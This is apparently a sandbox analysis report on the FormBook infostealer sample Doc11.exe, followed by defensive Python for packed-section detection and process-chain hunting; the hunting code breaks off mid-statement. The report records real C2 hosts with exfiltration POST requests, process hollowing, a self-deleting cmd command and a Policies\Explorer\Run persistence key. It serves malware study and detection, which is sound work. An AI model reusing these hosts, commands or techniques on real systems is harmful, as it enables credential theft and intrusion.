# Analysis Report Doc11.exe

## Overview

### General Information

- Sample Name: Doc11.exe
- Analysis ID: 288546
- MD5: f7ad3b59548788a59172b6477a1b83f0
- SHA1: 3b042b49ac135f38824de3665a051a7631e98782
- SHA256: f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5
- Tags: FormBook

### Detection

- Detection: FormBook
- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Antivirus / Scanner detection for submitted sample
- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for submitted file
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Creates an undocumented autostart registry key
- Machine Learning detection for sample
- Maps a DLL or memory area into another process
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Writes to foreign memory regions
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to call native functions
- Contains functionality to read the PEB
- Contains long sleeps (>= 3 min)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Enables debug privileges
- Found inlined nop instructions (likely shell or obfuscated code)
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- Queries the volume information (name, serial number etc) of a device
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

System is w10x64

- Doc11.exe (PID: 4936, cmdline: 'C:\Users\user\Desktop\Doc11.exe', MD5: F7AD3B59548788A59172B6477A1B83F0)
- RegAsm.exe (PID: 5836, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, MD5: 6FD7592411112729BF6B1F2F6C34899F)
- RegAsm.exe (PID: 5948, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, MD5: 6FD7592411112729BF6B1F2F6C34899F)
- explorer.exe (PID: 3384, cmdline: none recorded, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cscript.exe (PID: 4464, cmdline: C:\Windows\SysWOW64\cscript.exe, MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
- cmd.exe (PID: 5952, cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5708, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

## Malware Configuration

No configs have been found

## Yara Overview

### Memory Dumps

- Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x18349: $sqlite3step: 68 34 1C 7B E1
    - 0x1845c: $sqlite3step: 68 34 1C 7B E1
    - 0x18378: $sqlite3text: 68 38 2A 90 C5
    - 0x1849d: $sqlite3text: 68 38 2A 90 C5
    - 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
    - 0x184b3: $sqlite3blob: 68 53 D8 7F 8C
- Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0xc4a8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0xc712: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x18245: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x17d31: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x18347: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x184bf: $sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0xd12a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x16fac: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0xde23: $sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x1de37: $sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x1ee3a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

### Unpacked PEs

- Source: 2.2.RegAsm.exe.400000.0.raw.unpack
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0x98d8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x9b42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x15675: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x15161: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x15777: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x158ef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0xa55a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x143dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0xb253: $sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x1b267: $sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x1c26a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  - Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    - 0x18349: $sqlite3step: 68 34 1C 7B E1
    - 0x1845c: $sqlite3step: 68 34 1C 7B E1
    - 0x18378: $sqlite3text: 68 38 2A 90 C5
    - 0x1849d: $sqlite3text: 68 38 2A 90 C5
    - 0x1838b: $sqlite3blob: 68 53 D8 7F 8C
    - 0x184b3: $sqlite3blob: 68 53 D8 7F 8C
- Source: 2.2.RegAsm.exe.400000.0.unpack
  - Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  - Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    - 0x8ad8: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x8d42: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    - 0x14875: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    - 0x14361: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
    - 0x14977: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    - 0x14aef: $sequence_4: 5D C3 8D 50 7C 80 FA 07
    - 0x975a: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    - 0x135dc: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    - 0xa453: $sequence_7: 66 89 0C 02 5B 8B E5 5D
    - 0x1a467: $sequence_8: 3C 54 74 04 3C 74 75 F4
    - 0x1b46a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

- Antivirus / Scanner detection for submitted sample
  - Source: Doc11.exe Avira: detected
- Multi AV Scanner detection for submitted file
  - Source: Doc11.exe Virustotal: Detection: 34%
  - Source: Doc11.exe ReversingLabs: Detection: 25%
- Yara detected FormBook
  - Source: Yara match, file source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
  - Source: Yara match, file source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
  - Source: Yara match, file source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
  - Source: Yara match, file source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
  - Source: Yara match, file source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
- Machine Learning detection for sample
  - Source: Doc11.exe Joe Sandbox ML: detected
- Antivirus or Machine Learning detection for unpacked file
  - Source: 2.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
  - Source: 0.2.Doc11.exe.6320000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
- Found inlined nop instructions (likely shell or obfuscated code)
  - Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi
  - Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi
- HTTP GET or POST without a user agent
- Internet Provider seen in connection with other malware
  - Source: Joe Sandbox View ASN Name: LOOPIASE
  - Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
- Uses a known web browser user agent for HTTP communication
  - Source: global traffic HTTP traffic detected (409-byte body):

    ```http
    POST /dfc/ HTTP/1.1
    Host: www.snacklabbet.com
    Connection: close
    Content-Length: 409
    Cache-Control: no-cache
    Origin: http://www.snacklabbet.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.snacklabbet.com/dfc/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    ```

    Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
  - Source: global traffic HTTP traffic detected (185341-byte body; the report's hex dump of it is truncated and not reproduced here):

    ```http
    POST /dfc/ HTTP/1.1
    Host: www.snacklabbet.com
    Connection: close
    Content-Length: 185341
    Cache-Control: no-cache
    Origin: http://www.snacklabbet.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.snacklabbet.com/dfc/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    ```
  - Source: global traffic HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00):

    ```http
    GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1
    Host: www.chelsescompass.com
    Connection: close
    ```
  - Source: global traffic HTTP traffic detected (Data Raw: 00 00 00 00 00 00 00):

    ```http
    GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1
    Host: www.snacklabbet.com
    Connection: close
    ```
- Performs DNS lookups
  - Source: unknown DNS traffic detected: queries for: www.chelsescompass.com
- Posts data to webserver
  - Source: unknown HTTP traffic detected: POST /dfc/ HTTP/1.1 to Host: www.snacklabbet.com, Content-Length: 409 (the same request, headers and Data Ascii body as listed under "Uses a known web browser user agent for HTTP communication")
- Urls found in memory or binary data

### E-Banking Fraud:

- Yara detected FormBook
  - Source: Yara match, same fifteen file sources (11 of type MEMORY, 4 of type UNPACKEDPE) as listed under "AV Detection"

### System Summary:

- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
  - Matched rules (every source below matched both): "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group)
  - Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
  - Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
  - Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
  - Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
  - Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
  - Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
  - Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
  - Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
- Contains functionality to call native functions
- Detected potential crypto function
  - Source: code functions in C:\Users\user\Desktop\Doc11.exe, C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe and C:\Windows\SysWOW64\cscript.exe (per-function address list not reproduced)
 Found potential string decryption / allocating functions
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0312B150 appears 45 times Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04BEB150 appears 45 times
 Sample file is different than original file name gathered from version info
 Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePGzTmRHSQnoDrXlf.bounce.exe4 vs Doc11.exe
 Tries to load missing DLLs
 Yara signature match
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
 Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
 PE file has an executable .text section and no other executable section
 Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this application use the .NET runtime (probably coded in C#)
 Source: C:\Users\user\Desktop\Doc11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file
 Sample is known by Antivirus
 Source: Doc11.exe Virustotal: Detection: 34%
 Source: Doc11.exe ReversingLabs: Detection: 25%
 Spawns processes
 Source: unknown Process created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe'
 Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
 Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
 Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
 Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
 Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
 Uses an in-process (OLE) Automation server
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
 Writes ini files
 Checks if Microsoft Office is installed
 Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 PE file contains a COM descriptor data directory
 Source: Doc11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX
 Source: Doc11.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols
 Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp
 Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
 Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe
 Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
 Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417C5A push esp; iretd
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CDF5 push eax; ret
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041658D push ds; retf
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE42 push eax; ret
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE4B push eax; ret
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004176EE push cs; retf
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CEAC push eax; ret
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0317D0D1 push ecx; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C3D0D1 push ecx; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DB5C push edi; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DCA9 push 0D8910A8h; iretd
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B17C5A push esp; iretd
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CDF5 push eax; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CEAC push eax; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B176EE push cs; retf
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE42 push eax; ret
 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE4B push eax; ret
 Note that the low 16 bits of the offsets repeat across the two hosts (RegAsm.exe 0x0041xC5A/xCDF5/xCE42/xCE4B/xCEAC/x76EE against cscript.exe 0x00B1xC5A/xCDF5/xCE42/xCE4B/xCEAC/x76EE): the same injected payload is mapped into both processes at different base addresses.
 Binary may include packed or encrypted code
 Source: initial sample Static PE information: section name: .text entropy: 7.85074481612
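The two static signatures above (the .text section flagged as packed by its zlib compression ratio, and the .text entropy of 7.85) rest on one measurement of the section bytes. The following stdlib-only Python is an added example and not part of this report or of the sandbox's own code: it computes Shannon entropy and zlib compressibility for a buffer, walks the section table of a PE file and applies both checks to the executable sections. The 7.0-bit and 0.3 thresholds, the reading of "compression ratio" as the fraction of bytes zlib saves, the `build_demo_pe` helper and the constructed section contents are assumptions made for the demo; `pe_sections` itself works on a real file's bytes.

```python
"""Packed-section heuristics: Shannon entropy and zlib compressibility of PE sections."""
import hashlib
import math
import struct
import zlib

IMAGE_SCN_MEM_EXECUTE = 0x20000000
ENTROPY_THRESHOLD = 7.0          # bits/byte; assumed cut-off (the report's .text scored 7.85)
COMPRESSIBILITY_THRESHOLD = 0.3  # assumed reading of "zlib compression ratio < 0.3"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-symbol input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_compressibility(data: bytes) -> float:
    """Fraction of bytes zlib saves; near zero (or negative) for encrypted or packed data."""
    if not data:
        return 0.0
    return 1.0 - len(zlib.compress(data, 9)) / len(data)


def looks_packed(data: bytes) -> dict:
    e, c = shannon_entropy(data), zlib_compressibility(data)
    return {"entropy": round(e, 3), "compressibility": round(c, 3),
            "packed": e >= ENTROPY_THRESHOLD and c < COMPRESSIBILITY_THRESHOLD}


def pe_sections(image: bytes):
    """Yield (name, raw_bytes, characteristics) for each section header of a PE file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section table follows COFF + optional header
    for i in range(num_sections):
        off = table + i * 40
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        yield name.rstrip(b"\0").decode("ascii", "replace"), image[raw_ptr:raw_ptr + raw_size], chars


def scan_executable_sections(image: bytes) -> dict:
    """Apply the heuristic to executable sections only, as the signature does for .text."""
    return {name: looks_packed(raw) for name, raw, chars in pe_sections(image)
            if chars & IMAGE_SCN_MEM_EXECUTE}


# --- constructed demo inputs (not taken from the sample) ----------------------
def encrypted_like_bytes(n: int, seed: bytes = b"Doc11-demo") -> bytes:
    """Deterministic stand-in for a packed .text: SHA-256 in counter mode."""
    out = bytearray()
    for ctr in range(n // 32 + 1):
        out += hashlib.sha256(seed + ctr.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def plain_code_like_bytes(n: int) -> bytes:
    """Stand-in for ordinary compiled code: a short x86-style prologue tiled with NOPs."""
    pattern = bytes.fromhex("558bec83ec08568b750856e8000000008b4d0c5e8be55dc390909090")
    return (pattern * (n // len(pattern) + 1))[:n]


def build_demo_pe(sections) -> bytes:
    """Minimal PE32 headers plus sections; enough for pe_sections(), not a loadable image."""
    e_lfanew, opt_size, align = 0x40, 0xE0, 0x200
    header_len = e_lfanew + 24 + opt_size + 40 * len(sections)
    first_raw = -(-header_len // align) * align
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    table, body, raw_ptr = bytearray(), bytearray(), first_raw
    for name, payload, chars in sections:
        padded = payload + b"\0" * (-len(payload) % align)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(payload),
                             0x1000 + raw_ptr, len(padded), raw_ptr, 0, 0, 0, 0, chars)
        body += padded
        raw_ptr += len(padded)
    header = dos + coff + opt + table
    return bytes(header + b"\0" * (first_raw - len(header)) + body)


def demo_image() -> bytes:
    """Constructed PE: one packed executable section, one clean one, one data section."""
    return build_demo_pe([(b".text", encrypted_like_bytes(4096), 0x60000020),
                          (b".code", plain_code_like_bytes(4096), 0x60000020),
                          (b".rdata", plain_code_like_bytes(4096), 0x40000040)])


if __name__ == "__main__":
    for name, verdict in scan_executable_sections(demo_image()).items():
        print(name, verdict)
```

Against a real file, `scan_executable_sections(open(path, "rb").read())` is enough; the demo only exists so the walker can be exercised offline. Entropy alone over-fires on legitimately compressed resources, which is why the report pairs it with the executable-section requirement and the compression check.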

### Boot Survival:

 Creates an undocumented autostart registry key
 Source: C:\Windows\SysWOW64\cscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9 Jump to behavior
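The process tree under "Spawns processes" above and the Policies\Explorer\Run value written by cscript.exe here give three things to hunt for: a signed host binary (RegAsm.exe, cscript.exe) launched with an empty command line, a `cmd /c del` aimed at a binary under C:\Windows, and a value set under the undocumented Policies\Explorer\Run key. The following Python is an added example, not the report's or the sandbox's code; it evaluates those rules over Sysmon-style events constructed to mirror this report. The process IDs, the explorer.exe parent assumed for cscript.exe, the benign control events and the field names are assumptions.

```python
"""Hunting rules for the process chain and persistence seen in the Doc11.exe report,
evaluated over Sysmon-style events (EventID 1 = process create, 13 = registry value set)."""
import ntpath
import re

# Signed host binaries that loaders of this kind start and hollow. Each expects an
# argument (an assembly, a script, a project file) when run legitimately, so an
# empty command line is the tell.
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe",
                "cscript.exe", "wscript.exe"}
# Matches the HKLM and HKCU variants of the key; captures the value name.
PERSIST_KEY_RE = re.compile(r"\\policies\\explorer\\run\\([^\\]+)$", re.I)
# "del", optional /f /q style switches, then a quoted or bare target path.
DEL_RE = re.compile(r"\bdel\b(?:\s+/\w+)*\s+(?:['\"]([^'\"]+)['\"]|(\S+))", re.I)


def _args_of(cmdline: str, image: str) -> str:
    """Strip the image token (quoted, bare, or basename only) from a command line."""
    cmd = cmdline.strip()
    for token in (f'"{image}"', f"'{image}'", image, ntpath.basename(image)):
        if cmd.lower().startswith(token.lower()):
            return cmd[len(token):].strip()
    return cmd


def hunt(events):
    """Return (rule, pid, detail) findings, in event order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            image, parent = ev["Image"], ev["ParentImage"]
            base = ntpath.basename(image).lower()
            args = _args_of(ev["CommandLine"], image)
            # Rule 1: hollow-host binary launched with no arguments at all.
            if base in HOLLOW_HOSTS and args == "":
                findings.append(("empty_hollow_host_launch", ev["ProcessId"],
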